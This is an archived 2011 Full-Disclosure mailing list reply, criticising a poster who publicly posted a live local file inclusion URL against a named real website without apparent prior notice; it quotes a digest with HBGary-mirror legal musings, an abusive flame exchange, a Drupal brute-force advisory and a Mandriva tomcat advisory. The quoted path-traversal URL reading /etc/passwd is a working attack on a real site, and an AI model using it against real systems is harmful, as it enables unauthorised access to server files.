[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] LFI Bug and other



Uh, did you even disclose this to the provider first? Not meaning to be
funny, but really you should have taken screenshots, informed the abuse
team, given them a reasonable amount of time to fix, then disclosed the
problem once fixed or once the time had expired (whilst giving them warning
48 hours before hand).

My apologies if you have already disclosed this too them, but even if this
was the case, you should have explained the story better, showing the
disclosure timeframes etc.

Cal

On Sat, Feb 19, 2011 at 12:58 PM, Friedrich Hausberger <
fhausberger@xxxxxxxxx> wrote:

> Is full disclosure a security mailing list, where I can find hacking
> stuff or a magazine about
> chat show? I hate pornography also, but this is the wrong way to publish.
>
> Here you have a LFI vuln I found by accident:
>
> http://bc-heppenheim.de/download.php?datei=../../../../../etc/passwd.
> Feel free to download the whole Debian 4.0 Distribution.
>
> Most provider do not use jails/chroot or similar for their multi hosted
> webserver. Nearly all providers are hackable under 3 days.
>
> Regards
>
> FHausberger
>
> On 19/02/11 12:04, full-disclosure-request@xxxxxxxxxxxxxxxxx wrote:
> > Send Full-Disclosure mailing list submissions to
> >       full-disclosure@xxxxxxxxxxxxxxxxx
> >
> > To subscribe or unsubscribe via the World Wide Web, visit
> >       https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> > or, via email, send a message with subject or body 'help' to
> >       full-disclosure-request@xxxxxxxxxxxxxxxxx
> >
> > You can reach the person managing the list at
> >       full-disclosure-owner@xxxxxxxxxxxxxxxxx
> >
> > When replying, please edit your Subject line so it is more specific
> > than "Re: Contents of Full-Disclosure digest..."
> >
> >
> > Note to digest recipients - when replying to digest posts, please trim
> your post appropriately. Thank you.
> >
> >
> > Today's Topics:
> >
> >     1. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> >     2. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> >     3. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> >     4. Re: (this thread is now about porn).?
> >        (Cal Leeming [Simplicity Media Ltd])
> >     5. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> >     6. Re: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> >     7. Brute Force and Abuse of Functionality vulnerabilities in
> >        Drupal (MustLive)
> >     8. Re: Fwd: HBGary Mirrors? (Cal Leeming [Simplicity Media Ltd])
> >     9. Re: HBGary Mirrors? (Valdis.Kletnieks@xxxxxx)
> >    10. Re: Brute Force and Abuse of Functionality     vulnerabilities in
> >        Drupal (Justin Klein Keane)
> >    11. Re: Fwd: HBGary Mirrors? (Jeffrey Walton)
> >    12. [ MDVSA-2011:030 ] tomcat5 (security@xxxxxxxxxxxx)
> >    13. Deadline extension | MOBILITY 2011 || July 17-22,      2011 -
> >        Bournemouth, UK (Alejandro Cánovas Solbes)
> >    14. [ MDVSA-2011:031 ] python-django (security@xxxxxxxxxxxx)
> >    15. Re: Fwd: HBGary Mirrors? (Dani?l W. Crompton)
> >    16. Re: HBGary Mirrors? (William Warren)
> >    17. University of Central Florida Multiple LFI (Hack Talk)
> >    18. Re: University of Central Florida Multiple LFI (Madhur Ahuja)
> >
> >
> > ----------------------------------------------------------------------
> >
> > Message: 1
> > Date: Fri, 18 Feb 2011 19:12:19 +0000
> > From: "Cal Leeming [Simplicity Media Ltd]"
> >       <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> > Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> > To: decoder<decoder@xxxxxxxxxxxx>
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:
> >       <AANLkTi=A=qzbKu1L36Z+1bdxGhNfcA3T0ZUcNg9VQbvr@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="iso-8859-1"
> >
> > Heh, now that would be interesting. I wonder if the "intent" scenario
> would
> > apply to this also?
> >
> > On Fri, Feb 18, 2011 at 6:56 PM, decoder<decoder@xxxxxxxxxxxx>  wrote:
> >
> >>   I can't answer the question but it would be even more interesting to
> >> answer this if you're using a One-Time-Pad (i.e. two files of equal size
> on
> >> two different servers, both XORed give you the data). There exists a
> >> mathematical proof that none of the two files leak a single bit of
> >> information of the original data :)
> >>
> >>
> >> Chris
> >>
> >>
> >>
> >> On 02/18/2011 07:50 PM, Cal Leeming [Simplicity Media Ltd] wrote:
> >>
> >> Sorry, when I say eligible, I mean "which server would they be allowed
> to
> >> take down by law?".
> >>
> >>   I'm not too hot on the laws of encryption, but I'm sure there is
> >> something which states that hosting encrypted files are not illegal,
> it's
> >> distributing the key which allows you to gain access to those fails,
> which
> >> is actually illegal.
> >>
> >>   *DISCLAIMER: I don't know if the above is true or not, so apologies if
> I
> >> got this wrong*
> >>
> >>
> >> On Fri, Feb 18, 2011 at 6:46 PM, ck<c.kernstock@xxxxxxxxxxxxxx>  wrote:
> >>
> >> I go with the server hosting the files since the key should be
> >> significant smaller than the files and therefor much easier to mirror.
> >>
> >> On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]
> >> <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>  wrote:
> >>> So here's a thought.
> >>> If illegally distributed files (such as this one) were encrypted and
> >> hosted
> >>> on one server, and the key hosted on another, which server would
> >>> be eligible for take down?
> >>>
> >>
> >>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/23151a9f/attachment-0001.html
> >
> > ------------------------------
> >
> > Message: 2
> > Date: Fri, 18 Feb 2011 19:11:44 +0000
> > From: "Cal Leeming [Simplicity Media Ltd]"
> >       <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> > Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> > To: Charles Morris<cmorris@xxxxxxxxxx>
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:
> >       <AANLkTimy01XQP-eFHOAVCjzbCd5Wg3ZNw6QPZWMXktAP@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="iso-8859-1"
> >
> > I'm wondering along the same lines as Thor, based on intent. One of those
> > "don't take the piss or the judge is gonna own you" scenarios that would
> be
> > tested in court on a per trial basis. Like, if the files were known to
> > contain encrypted info, and if it was proved that you knew the contents
> of
> > those files, then you would be held liable.
> >
> > @Charles: luckily for me, this is all academic as I've kept as far away
> as
> > possible from this hbgary thing :P
> >
> > On Fri, Feb 18, 2011 at 6:57 PM, Charles Morris<cmorris@xxxxxxxxxx>
>  wrote:
> >
> >>> Sorry, when I say eligible, I mean "which server would they be allowed
> to
> >>> take down by law?".
> >>> I'm not too hot on the laws of encryption, but I'm sure there is
> >> something
> >>> which states that hosting encrypted files are not illegal, it's
> >> distributing
> >>> the key which allows you to gain access to those fails, which is
> actually
> >>> illegal.
> >>> *DISCLAIMER: I don't know if the above is true or not, so apologies if
> I
> >> got
> >>> this wrong*
> >>>
> >> Attempt A:
> >> Cal, I'm not sure on this point off-the-cuff, however encrypted files
> >> should* be
> >> indistinguishable from random data, so assuming that even if a given LEE
> >> has obtained the key and knows that your distributed data is "illegal",
> you
> >> could be held blameless as you have no feasible way to know what the
> data
> >> was.
> >>
> >> Attempt 2:
> >> You could also consider a key and an algorithm a "transform" for a set
> of
> >> random
> >> bits, such that once the transform is applied to those bits it would
> >> result in something
> >> "bad", so you aren't actually distributing "encrypted" "files" at all..
> >>
> >> just random bits :D
> >>
> >> *DISCLAIMER: The above will PROBABLY NOT hold in court, so apologies
> >> if you get jailed for life
> >>
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/1a680f5f/attachment-0001.html
> >
> > ------------------------------
> >
> > Message: 3
> > Date: Fri, 18 Feb 2011 14:28:02 -0500
> > From: Valdis.Kletnieks@xxxxxx
> > Subject: Re: [Full-disclosure] HBGary Mirrors?
> > To: "Cal Leeming [Simplicity Media Ltd]"
> >       <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<12318.1298057282@localhost>
> > Content-Type: text/plain; charset="us-ascii"
> >
> > On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]"
> said:
> >> If illegally distributed files (such as this one) were encrypted and
> hosted
> >> on one server, and the key hosted on another, which server would
> >> be eligible for take down?
> > Questions like that are part of why FreeNet and similar systems were
> designed.
> > Nobody wants to be the test case for a simple question like that one,
> because
> > even if you win the test case, it still sucks.  So the obvious thing to
> do is
> > fix things so the simple questions aren't an issue anymore, with the hope
> that
> > the hard questions remain un-askable.
> >
> > When even the person who stored the file can't tell where the file is,
> and
> > the admin of each participating server has no way of telling what got
> stored
> > on their node, it becomes really hard to draft a proper legal notice
> (either
> > a 17 USC 512 takedown notice, or subpoenas/warrants for more serious
> stuff).
> >
> >
> >
> >
> > -------------- next part --------------
> > A non-text attachment was scrubbed...
> > Name: not available
> > Type: application/pgp-signature
> > Size: 227 bytes
> > Desc: not available
> > Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/6e2c43af/attachment-0001.bin
> >
> > ------------------------------
> >
> > Message: 4
> > Date: Fri, 18 Feb 2011 19:28:12 +0000
> > From: "Cal Leeming [Simplicity Media Ltd]"
> >       <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> > Subject: Re: [Full-disclosure] (this thread is now about porn).?
> > To: "andrew.wallace"<andrew.wallace@xxxxxxxxxxxxxx>
> > Cc: "full-disclosure@xxxxxxxxxxxxxxxxx"
> >       <full-disclosure@xxxxxxxxxxxxxxxxx>
> > Message-ID:
> >       <AANLkTimrA6nUJUN_caqFPOjVTFfv1mW6W2KufVBWSbGU@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="iso-8859-1"
> >
> > Andrew, I used to fucking work in a NOC as a security consultant you
> idiotic
> > piece of shit. I also used to spend 12 - 18 hours a day in various
> > data centres in Harbour Exchange.
> >
> > Go and check my linkedin.
> >
> > Oh and, as promised: http://bit.ly/eQIk4O
> >
> >
> >
> > On Fri, Feb 18, 2011 at 7:22 PM, andrew.wallace<
> > andrew.wallace@xxxxxxxxxxxxxx>  wrote:
> >
> >> On Fri, Feb 18, 2011 at 4:50 PM, Cal Leeming [Simplicity Media Ltd]<
> >> cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>  wrote:
> >>> "operations centre email system"
> >> When you ever get a job in the industry, which is unlikely because of
> your
> >> criminal record you might get to know what an operations centre is.
> >>
> >> http://en.wikipedia.org/wiki/Network_operations_center
> >>
> >> Andrew
> >>
> >>
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/0683cef8/attachment-0001.html
> >
> > ------------------------------
> >
> > Message: 5
> > Date: Fri, 18 Feb 2011 13:24:31 -0500
> > From: Valdis.Kletnieks@xxxxxx
> > Subject: Re: [Full-disclosure] HBGary Mirrors?
> > To: ck<c.kernstock@xxxxxxxxxxxxxx>
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<8886.1298053471@localhost>
> > Content-Type: text/plain; charset="us-ascii"
> >
> > On Fri, 18 Feb 2011 17:24:23 +0100, ck said:
> >> So, the FEDs shut down all mirrors of the HBGary files - or didn't they?
> > Between the Streisand Effect and things like Tor and FreeNet, the Feds
> > will never be sure if they got all the copies or not.
> > -------------- next part --------------
> > A non-text attachment was scrubbed...
> > Name: not available
> > Type: application/pgp-signature
> > Size: 227 bytes
> > Desc: not available
> > Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/ea1582a1/attachment-0001.bin
> >
> > ------------------------------
> >
> > Message: 6
> > Date: Fri, 18 Feb 2011 19:30:49 +0000
> > From: "Cal Leeming [Simplicity Media Ltd]"
> >       <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> > Subject: Re: [Full-disclosure] HBGary Mirrors?
> > To: Valdis.Kletnieks@xxxxxx
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:
> >       <AANLkTi=Th4KjohijmcFWUYYb8Hkq1V_6Qt6vh9-CBwUG@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="iso-8859-1"
> >
> > Oh, I didn't realise that's what FreeNet did, I thought it was a tor
> > alternative!
> >
> > On Fri, Feb 18, 2011 at 7:28 PM,<Valdis.Kletnieks@xxxxxx>  wrote:
> >
> >> On Fri, 18 Feb 2011 18:37:09 GMT, "Cal Leeming [Simplicity Media Ltd]"
> >> said:
> >>> If illegally distributed files (such as this one) were encrypted and
> >> hosted
> >>> on one server, and the key hosted on another, which server would
> >>> be eligible for take down?
> >> Questions like that are part of why FreeNet and similar systems were
> >> designed.
> >> Nobody wants to be the test case for a simple question like that one,
> >> because
> >> even if you win the test case, it still sucks.  So the obvious thing to
> do
> >> is
> >> fix things so the simple questions aren't an issue anymore, with the
> hope
> >> that
> >> the hard questions remain un-askable.
> >>
> >> When even the person who stored the file can't tell where the file is,
> and
> >> the admin of each participating server has no way of telling what got
> >> stored
> >> on their node, it becomes really hard to draft a proper legal notice
> >> (either
> >> a 17 USC 512 takedown notice, or subpoenas/warrants for more serious
> >> stuff).
> >>
> >>
> >>
> >>
> >>
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/7f780c84/attachment-0001.html
> >
> > ------------------------------
> >
> > Message: 7
> > Date: Fri, 18 Feb 2011 21:30:37 +0200
> > From: "MustLive"<mustlive@xxxxxxxxxxxxxxxxxx>
> > Subject: [Full-disclosure] Brute Force and Abuse of Functionality
> >       vulnerabilities in Drupal
> > To:<submissions@xxxxxxxxxxxxxxxxxxxxxxx>,
> >       <full-disclosure@xxxxxxxxxxxxxxxxx>,    <bugtraq@xxxxxxxxxxxxxxxxx
> >
> > Message-ID:<00bb01cbcfa2$85e107c0$c103fea9@ml>
> > Content-Type: text/plain; format=flowed; charset="windows-1251";
> >       reply-type=original
> >
> > Hello list!
> >
> > I want to warn you about Brute Force and Abuse of Functionality
> > vulnerabilities in Drupal.
> >
> > -------------------------
> > Affected products:
> > -------------------------
> >
> > Vulnerable are Drupal 6.20 and previous versions.
> >
> > ----------
> > Details:
> > ----------
> >
> > Brute Force (WASC-11):
> >
> > In login form (http://site/user/) there is no reliable protection
> against
> > brute force attacks. There is no captcha in Drupal itself, and existent
> > Captcha module (http://websecurity.com.ua/4749/) is vulnerable (and also
> all
> > plugins to it, such as reCAPTCHA (http://websecurity.com.ua/4752/).
> >
> > Abuse of Functionality (WASC-42):
> >
> > At contact page (http://site/contact) and at page for contact with user
> > (http://site/user/1/contact) there is a possibility to send spam from
> the
> > site to arbitrary e-mails via function "Send yourself a copy". And with
> > using of Insufficient Anti-automation vulnerability it's possible to send
> > spam from the site in automated manner on a large scale. The attack with
> > using of this function is possible only for logged in users.
> >
> > For automated sending of spam it's needed to use before-mentioned
> > Insufficient Anti-automation vulnerabilities - there is no captcha in
> Drupal
> > itself, and existent captcha-module is vulnerable (and also all plugins
> to
> > it, such as reCAPTCHA).
> >
> > About such Abuse of Functionality vulnerabilities I wrote in article
> Sending
> > spam via sites and creating spam-botnets
> > (
> http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html
> ).
> >
> > Abuse of Functionality (WASC-42):
> >
> > At request to specific pages of the site with setting login
> > (http://site/users/user) it's possible to find existent logins of the
> users
> > at site (i.e. to enumerate logins). If shows "Access denied" - then such
> > login exists, and if "Page not found" - then no.
> >
> > At request to pages for contact with users (http://site/user/1/contact)
> > login of the user shows (i.e. it's possible to enumerate logins). The
> attack
> > is possible to conduct only for logged in users and it'll work only if
> > attacked user turned on the option "Personal contact form" in his
> profile.
> >
> > ------------
> > Timeline:
> > ------------
> >
> > 2010.12.15 - announced at my site.
> > 2010.12.16 - informed developers.
> > 2011.02.17 - disclosed at my site.
> >
> > I mentioned about these vulnerabilities at my site
> > (http://websecurity.com.ua/4763/).
> >
> > Best wishes&  regards,
> > MustLive
> > Administrator of Websecurity web site
> > http://websecurity.com.ua
> >
> >
> >
> >
> > ------------------------------
> >
> > Message: 8
> > Date: Fri, 18 Feb 2011 19:43:18 +0000
> > From: "Cal Leeming [Simplicity Media Ltd]"
> >       <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> > Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> > To: Veg<veg@xxxxxxxxxxxxxxx>, full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:
> >       <AANLkTikHnV+31ff22q2p8JEVxekSiXoUXHWh8m1EgVoF@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset="iso-8859-1"
> >
> > LMAO, that's fucking brilliant. :D
> >
> > (had to modify the reply a little, Google was picking it up as spam, and
> > forcibly not sending out :S)
> >
> > On Fri, Feb 18, 2011 at 7:37 PM, Cal Leeming [Simplicity Media Ltd]<
> > cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>  wrote:
> >
> >>
> >>
> >>> On Fri, Feb 18, 2011 at 7:33 PM, Veg<*****>  wrote:
> >>>
> >>>> Pertaining to your question about the key versus the cryptotext:
> >>>>
> >>>> *http://bit.ly/hSmqvA*
> >>>>
> >>>>
> >>>>
> >>>>
> > -------------- next part --------------
> > An HTML attachment was scrubbed...
> > URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/95095ea0/attachment-0001.html
> >
> > ------------------------------
> >
> > Message: 9
> > Date: Fri, 18 Feb 2011 14:45:03 -0500
> > From: Valdis.Kletnieks@xxxxxx
> > Subject: Re: [Full-disclosure] HBGary Mirrors?
> > To: "Cal Leeming [Simplicity Media Ltd]"
> >       <cal.leeming@xxxxxxxxxxxxxxxxxxxxxxxx>
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<13207.1298058303@localhost>
> > Content-Type: text/plain; charset="us-ascii"
> >
> > On Fri, 18 Feb 2011 19:30:49 GMT, you said:
> >> Oh, I didn't realise that's what FreeNet did, I thought it was a tor
> >> alternative!
> > http://en.wikipedia.org/wiki/Freenet
> >
> > https://freenetproject.org/
> >
> > It's a semi-alternative.  Both address the "make it difficult to trace"
> > issue in somewhat similar ways.  Tor is probably more famous for its
> > "provide an anonymous proxy" function, but also supports "hidden"
> storage.
> > The biggest difference is that in the Tor case, the person running the
> > storage knows where the files are and what they are - it's just difficult
> > for anybody else to find out where it really is.  Freenet is more
> oriented
> > towards totally obfuscated storage, where *nobody* knows what a given
> file
> > is, or where it is actually stored, until you actually fetch it (and even
> > then, you don't know where the data came from).
> > -------------- next part --------------
> > A non-text attachment was scrubbed...
> > Name: not available
> > Type: application/pgp-signature
> > Size: 227 bytes
> > Desc: not available
> > Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110218/48a305f4/attachment-0001.bin
> >
> > ------------------------------
> >
> > Message: 10
> > Date: Fri, 18 Feb 2011 14:45:46 -0500
> > From: Justin Klein Keane<justin@xxxxxxxxxxxx>
> > Subject: Re: [Full-disclosure] Brute Force and Abuse of Functionality
> >       vulnerabilities in Drupal
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<4D5ECC6A.7080501@xxxxxxxxxxxx>
> > Content-Type: text/plain; charset=ISO-8859-1
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > MustLive:  you're a little late to this party, see
> > http://www.madirish.net/?article=443, published Dec 2009.  The other
> > issues you mention may already be disclosed.  The Drupal Login Security
> > module (http://drupal.org/project/login_security) is an effective
> > mitigation for some of these problems.  Do you do any research before
> > you publish these advisories?
> >
> > Justin Klein Keane
> > http://www.MadIrish.net
> >
> > The digital signature on this message can be confirmed using
> > the public key at http://www.madirish.net/gpgkey
> >
> > On 02/18/2011 02:30 PM, MustLive wrote:
> >> Hello list!
> >>
> >> I want to warn you about Brute Force and Abuse of Functionality
> >> vulnerabilities in Drupal.
> >>
> >> -------------------------
> >> Affected products:
> >> -------------------------
> >>
> >> Vulnerable are Drupal 6.20 and previous versions.
> >>
> >> ----------
> >> Details:
> >> ----------
> >>
> >> Brute Force (WASC-11):
> >>
> >> In login form (http://site/user/) there is no reliable protection
> against
> >> brute force attacks. There is no captcha in Drupal itself, and existent
> >> Captcha module (http://websecurity.com.ua/4749/) is vulnerable (and
> also all
> >> plugins to it, such as reCAPTCHA (http://websecurity.com.ua/4752/).
> >>
> >> Abuse of Functionality (WASC-42):
> >>
> >> At contact page (http://site/contact) and at page for contact with user
> >> (http://site/user/1/contact) there is a possibility to send spam from
> the
> >> site to arbitrary e-mails via function "Send yourself a copy". And with
> >> using of Insufficient Anti-automation vulnerability it's possible to
> send
> >> spam from the site in automated manner on a large scale. The attack with
> >> using of this function is possible only for logged in users.
> >>
> >> For automated sending of spam it's needed to use before-mentioned
> >> Insufficient Anti-automation vulnerabilities - there is no captcha in
> Drupal
> >> itself, and existent captcha-module is vulnerable (and also all plugins
> to
> >> it, such as reCAPTCHA).
> >>
> >> About such Abuse of Functionality vulnerabilities I wrote in article
> Sending
> >> spam via sites and creating spam-botnets
> >> (
> http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html
> ).
> >>
> >> Abuse of Functionality (WASC-42):
> >>
> >> At request to specific pages of the site with setting login
> >> (http://site/users/user) it's possible to find existent logins of the
> users
> >> at site (i.e. to enumerate logins). If shows "Access denied" - then such
> >> login exists, and if "Page not found" - then no.
> >>
> >> At request to pages for contact with users (http://site/user/1/contact)
> >> login of the user shows (i.e. it's possible to enumerate logins). The
> attack
> >> is possible to conduct only for logged in users and it'll work only if
> >> attacked user turned on the option "Personal contact form" in his
> profile.
> >>
> >> ------------
> >> Timeline:
> >> ------------
> >>
> >> 2010.12.15 - announced at my site.
> >> 2010.12.16 - informed developers.
> >> 2011.02.17 - disclosed at my site.
> >>
> >> I mentioned about these vulnerabilities at my site
> >> (http://websecurity.com.ua/4763/).
> >>
> >> Best wishes&  regards,
> >> MustLive
> >> Administrator of Websecurity web site
> >> http://websecurity.com.ua
> >>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.11 (GNU/Linux)
> > Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
> >
> > iPwEAQECAAYFAk1ezF8ACgkQkSlsbLsN1gA3KAb9GAwPgHQPFrmPSam+i9/BDIm0
> > jiR7Yxx0A9ubv3xvQAyz+cVIvcXEXVE040PirkpcnC6lY4ZXWCdvzUiYVrkarlJC
> > y6CZ8WVw8xsnjxZb382wHUE00SQF4rylAv4OP0WYDDUqjdEPA+CLxKfaO/LtrmIB
> > b3QNPEkJhrxNnW6nHc+JeqAG6Ukz+0zpKen+Wi1IPaOR1XGMaiak7IjSdN91u/XV
> > MHlOKyOr1NLEOMze2+rH8PexbrWAXuWyj74F+2lVOeiiD95ZY3CpnIVKJGb6G79h
> > EuSuV/+JZ/Idj7pWIO4=
> > =pZNB
> > -----END PGP SIGNATURE-----
> >
> >
> >
> > ------------------------------
> >
> > Message: 11
> > Date: Fri, 18 Feb 2011 14:48:32 -0500
> > From: Jeffrey Walton<noloader@xxxxxxxxx>
> > Subject: Re: [Full-disclosure] Fwd: HBGary Mirrors?
> > To: "Thor (Hammer of God)"<thor@xxxxxxxxxxxxxxx>
> > Cc: "full-disclosure@xxxxxxxxxxxxxxxxx"
> >       <full-disclosure@xxxxxxxxxxxxxxxxx>
> > Message-ID:
> >       <AANLkTinZt1p4ZzrLQJ-8=KitnZW4=ggpABxphEiYVG6L@xxxxxxxxxxxxxx>
> > Content-Type: text/plain; charset=windows-1252
> >
> > On Fri, Feb 18, 2011 at 2:03 PM, Thor (Hammer of God)
> > <thor@xxxxxxxxxxxxxxx>  wrote:
> >> It would ultimately come down to ?intent.?? Technically of course, the
> >> encrypted file is not the original file.? Never will be.? Can?t be.?
> They
> >> keys are not either.? ?Used together they can reproduce the copyright
> >> data.?? So legally, there would certainly be an interesting argument
> about
> >> what is and what isn?t legal.?? But there would be plenty of cause for
> an
> >> injunction which would put the kibosh on distribution until that legal
> >> decision was made.? It doesn?t have to make sense, and it doesn?t have
> to be
> >> strictly ?legal? but it is up to a judge.? Recall that 9th circuit judge
> >> Kermit (I believe) ruled against emails on an ISPs server being in scope
> for
> >> wiretap laws since, at the time the ISP was reading them, they were not
> ?in
> >> transit.?? Go figure.
> >>
> >>
> >>
> >> If a judge ruled that you were purposely encrypting data and
> distributing
> >> keys to get around copyright laws, he could easily rule against you
> anyway.
> > You gotta love "legislating from the bench." Its too bad US
> > politicians do such a poor job that others have to fix their mess.
> >
> > Jeff
> >
> >
> >
> > ------------------------------
> >
> > Message: 12
> > Date: Fri, 18 Feb 2011 22:10:00 +0100
> > From: security@xxxxxxxxxxxx
> > Subject: [Full-disclosure] [ MDVSA-2011:030 ] tomcat5
> > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > Message-ID:<E1PqXaS-0005e2-Kp@xxxxxxxxxxxxxxxxxx>
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >   _______________________________________________________________________
> >
> >   Mandriva Linux Security Advisory                         MDVSA-2011:030
> >   http://www.mandriva.com/security/
> >   _______________________________________________________________________
> >
> >   Package : tomcat5
> >   Date    : February 18, 2011
> >   Affected: 2009.0, 2010.0, 2010.1, Enterprise Server 5.0
> >   _______________________________________________________________________
> >
> >   Problem Description:
> >
> >   Multiple vulnerabilities has been found and corrected in tomcat5:
> >
> >   When running under a SecurityManager, access to the file system is
> >   limited but web applications are granted read/write permissions to
> >   the work directory. This directory is used for a variety of temporary
> >   files such as the intermediate files generated when compiling JSPs
> >   to Servlets. The location of the work directory is specified by
> >   a ServletContect attribute that is meant to be read-only to web
> >   applications. However, due to a coding error, the read-only setting
> >   was not applied. Therefore, a malicious web application may modify
> >   the attribute before Tomcat applies the file permissions. This can be
> >   used to grant read/write permissions to any area on the file system
> >   which a malicious web application may then take advantage of. This
> >   vulnerability is only applicable when hosting web applications from
> >   untrusted sources such as shared hosting environments (CVE-2010-3718).
> >
> >   The HTML Manager interface displayed web applciation provided data,
> >   such as display names, without filtering. A malicious web application
> >   could trigger script execution by an administartive user when viewing
> >   the manager pages (CVE-2011-0013).
> >
> >   Packages for 2009.0 are provided as of the Extended Maintenance
> >   Program. Please visit this link to learn more:
> >
> http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490
> >
> >   The updated packages have been patched to correct these issues.
> >   _______________________________________________________________________
> >
> >   References:
> >
> >   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3718
> >   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0013
> >   _______________________________________________________________________
> >
> >   Updated Packages:
> >
> >   Mandriva Linux 2009.0:
> >   4acc23d840bdd74a8a2a27717c57f813
>  2009.0/i586/tomcat5-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   d901fdb0a4995bf9eb2870b3c9a1d249
>  2009.0/i586/tomcat5-admin-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   ae34366f41b039c6e53631b185547a7b
>  2009.0/i586/tomcat5-common-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   ade05ceda9f2ae4fb342e7ef5df474e2
>  2009.0/i586/tomcat5-jasper-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   51fab09365486ad60ed686935c1c7511
>  2009.0/i586/tomcat5-jasper-eclipse-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   5f1fc1ea7c38546a38a04000cdf9212a
>  2009.0/i586/tomcat5-jasper-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   bddc26db0a0e9aea3223927566b11442
>  2009.0/i586/tomcat5-jsp-2.0-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   effd51cb30b8d2bb5f12a3a0507b1260
>  2009.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   e71a36bd07ad8f241104e0e322900d55
>  2009.0/i586/tomcat5-server-lib-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   fc68ce165e49fa63529cda996f9e7e6f
>  2009.0/i586/tomcat5-servlet-2.4-api-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   aa8f7e5205aa734f94661d2e1d87cf03
>  
> 2009.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   09488edfcc731340c51322540e050445
>  2009.0/i586/tomcat5-webapps-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
> >   78f469b9bdf9461e9dd423fa51a00fbb
>  2009.0/SRPMS/tomcat5-5.5.27-0.3.0.4mdv2009.0.src.rpm
> >
> >   Mandriva Linux 2009.0/X86_64:
> >   7f3a9c9a0f48012967fece5d682cc344
>  2009.0/x86_64/tomcat5-5.5.27-0.3.0.4mdv2009.0.noarch.rpm
